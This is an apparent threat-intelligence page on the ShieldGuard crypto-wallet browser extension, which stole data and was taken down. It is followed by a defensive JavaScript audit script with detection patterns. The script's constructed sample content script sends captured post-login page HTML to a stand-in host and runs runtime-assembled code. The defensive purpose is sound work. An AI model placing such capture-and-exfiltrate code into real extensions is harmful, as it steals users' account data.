
ShieldGuard malicious browser extension operation dismantled after data harvesting campaign uncovered

1 unique source, 1 article

Summary


A cryptocurrency-themed browser extension named ShieldGuard, marketed as a security tool for crypto wallets, was dismantled after researchers discovered it functioned as malware designed to harvest sensitive user data from major crypto platforms and general browsing sessions. The operation employed social media promotion, browser extension listings, and token airdrop incentives to lure users into installing the malicious extension. ShieldGuard targeted Binance, Coinbase, MetaMask, and general browsing activity, capturing wallet addresses and post-login HTML content, persisting across browsing sessions, and enabling remote code execution via a command-and-control (C2) server.

Timeline

  1. 18.03.2026 16:15 · 1 article

    ShieldGuard malicious browser extension dismantled after data harvesting uncovered

    A cryptocurrency-themed browser extension named ShieldGuard, marketed as a security tool for crypto wallets, was dismantled after researchers discovered it functioned as malware designed to harvest sensitive user data from major crypto platforms and general browsing sessions. The extension harvested wallet addresses, captured full HTML content from crypto platforms after login, tracked users persistently across sessions, and executed remote code via a command-and-control server. ShieldGuard used obfuscation and a custom JavaScript interpreter to bypass Chrome security restrictions, enabling dynamic code delivery and execution without triggering standard protections.


Information Snippets

  • ShieldGuard was promoted as a security tool protecting crypto wallets from phishing and harmful smart contracts, but functioned as malware harvesting user data from Binance, Coinbase, MetaMask, and general browsing activity.

    First reported: 18.03.2026 16:15
    1 source, 1 article
  • The extension harvested wallet addresses, captured full HTML content from crypto platforms after login, tracked users persistently across sessions, and executed remote code via a C2 server.

    First reported: 18.03.2026 16:15
    1 source, 1 article
  • ShieldGuard used obfuscation and a custom JavaScript interpreter to bypass Chrome security restrictions, enabling dynamic code delivery and execution without triggering standard protections.

    First reported: 18.03.2026 16:15
    1 source, 1 article
  • Attackers leveraged the malware to collect account balances, transaction histories, portfolio data, and in some cases redirected users to fake warning pages controlled by the attackers.

    First reported: 18.03.2026 16:15
    1 source, 1 article
  • Evidence suggests Russian-speaking operators, with links to another campaign known as 'Radex,' indicating a broader threat network.

    First reported: 18.03.2026 16:15
    1 source, 1 article
  • Okta Threat Intelligence collaborated with industry partners to remove the extension from the Chrome Web Store, take down associated domains, disable backend infrastructure, and block user sign-in functionality, effectively severing communication between infected browsers and attacker servers.

    First reported: 18.03.2026 16:15
    1 source, 1 article
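The snippets above describe the combination that made this extension dangerous: reach into exchange and wallet origins, capture of post-login page content sent to an outside server, obfuscation, and an execution path for code the extension did not ship with (Manifest V3 forbids remotely hosted code, which is why a bundled interpreter or eval-style constructs stand out). The following is an added example written for this page, not code from the original article or from Okta's research: a static, defender-side audit that checks an extension's manifest for that reach and scans its scripts for those indicators, then combines the two into a verdict. It goes beyond the single case in the text by evaluating arbitrary Chrome host patterns. The `CRYPTO_ORIGINS` watchlist, the indicator regexes, the sample manifest and the sample script are all constructed for illustration and are not ShieldGuard artifacts.

```javascript
// Added example (not from the original page or the research it reports): a static,
// defender-side audit of a Chrome extension package. The watchlist, heuristics,
// manifest and script below are constructed samples, not ShieldGuard artifacts.

// Hypothetical watchlist of origins the incident names; extend as needed.
const CRYPTO_ORIGINS = ['binance.com', 'coinbase.com', 'metamask.io'];

// Does a Chrome match pattern (e.g. "*://*.binance.com/*") cover `domain`?
function hostPatternCovers(pattern, domain) {
  if (pattern === '<all_urls>') return true;
  const m = /^(\*|https?):\/\/([^/]+)\//.exec(pattern);
  if (!m) return false;
  const host = m[2];
  if (host === '*') return true;
  if (host.startsWith('*.')) {
    const suffix = host.slice(2);
    return domain === suffix || domain.endsWith('.' + suffix);
  }
  return host === domain;
}

// Manifest-level indicators: where the extension can reach and what it may inject.
function auditManifest(manifest) {
  const findings = [];
  const patterns = [
    ...(manifest.host_permissions || []),
    ...(manifest.permissions || []).filter((p) => p === '<all_urls>' || p.includes('://')),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  // A sentinel domain nothing legitimate would list: only "everything" patterns cover it.
  if (patterns.some((p) => hostPatternCovers(p, 'nonexistent-sentinel.invalid'))) {
    findings.push({ id: 'all-sites-access', detail: 'a host pattern matches every site' });
  }
  const covered = CRYPTO_ORIGINS.filter((d) => patterns.some((p) => hostPatternCovers(p, d)));
  if (covered.length) {
    findings.push({ id: 'crypto-origin-access', detail: covered.join(', ') });
  }
  if ((manifest.permissions || []).includes('scripting')) {
    findings.push({ id: 'scripting-permission', detail: 'may inject code into matched tabs' });
  }
  // MV3 uses an object of CSP strings; MV2 used a single string. Handle both.
  const cspRaw = manifest.content_security_policy;
  const csp = typeof cspRaw === 'string' ? cspRaw : Object.values(cspRaw || {}).join(' ');
  if (csp.includes('unsafe-eval')) {
    findings.push({ id: 'unsafe-eval-csp', detail: 'CSP permits eval-style execution' });
  }
  return findings;
}

// Source-level indicators, reported in this order. Heuristics, not proof on their own.
const SCRIPT_INDICATORS = [
  { id: 'eval', re: /\beval\s*\(/ },
  { id: 'function-constructor', re: /\bFunction\s*\(/ },
  { id: 'html-capture', re: /document\.(documentElement|body)\.(outerHTML|innerHTML)/ },
  { id: 'external-post', re: /\bfetch\s*\(\s*['"`]https?:\/\// },
  { id: 'hex-obfuscation', re: /(\\x[0-9a-fA-F]{2}){6,}/ },
];

function scanScript(source) {
  return SCRIPT_INDICATORS.filter(({ re }) => re.test(source)).map(({ id }) => id);
}

// Combine: broad reach plus dynamic code, or page capture plus outbound posting, is high-risk.
function auditExtension({ manifest, scripts }) {
  const manifestFindings = auditManifest(manifest);
  const scriptFindings = [...new Set(Object.values(scripts).flatMap((src) => scanScript(src)))];
  const ids = new Set(manifestFindings.map((f) => f.id));
  const broadReach = ids.has('all-sites-access') || ids.has('crypto-origin-access');
  const dynamicCode = scriptFindings.includes('eval') || scriptFindings.includes('function-constructor');
  const exfil = scriptFindings.includes('html-capture') && scriptFindings.includes('external-post');
  let verdict = 'clean';
  if (broadReach && (dynamicCode || exfil)) verdict = 'high-risk';
  else if (manifestFindings.length || scriptFindings.length) verdict = 'review';
  return { manifestFindings, scriptFindings, verdict };
}

// Constructed sample package shaped like the behaviour the incident describes.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'Wallet Shield (constructed sample)',
  permissions: ['storage', 'scripting', 'tabs'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['*://*.binance.com/*', '*://*.coinbase.com/*'], js: ['content.js'] }],
};

const SAMPLE_SCRIPTS = {
  'content.js': `
    const page = document.documentElement.outerHTML;   // full page after login
    fetch('https://collector.invalid/upload', { method: 'POST', body: page });
    const code = "\\x63\\x6f\\x6e\\x73\\x6f\\x6c\\x65";   // hex-escaped string literal
    new Function(code)();                                // runs code assembled at runtime
  `,
};

console.log(JSON.stringify(auditExtension({ manifest: SAMPLE_MANIFEST, scripts: SAMPLE_SCRIPTS }), null, 2));
```

Run with `node audit.js` after pasting it into a file; to audit a real unpacked extension, read `manifest.json` and each file listed under `content_scripts[].js` and `background.service_worker` into the `manifest` and `scripts` arguments. The `hex-obfuscation` and `function-constructor` checks will also fire on some legitimate minified bundles, so treat a `review` verdict as a queue for manual inspection and reserve action for `high-risk` packages whose reach and behaviour line up the way this one's did.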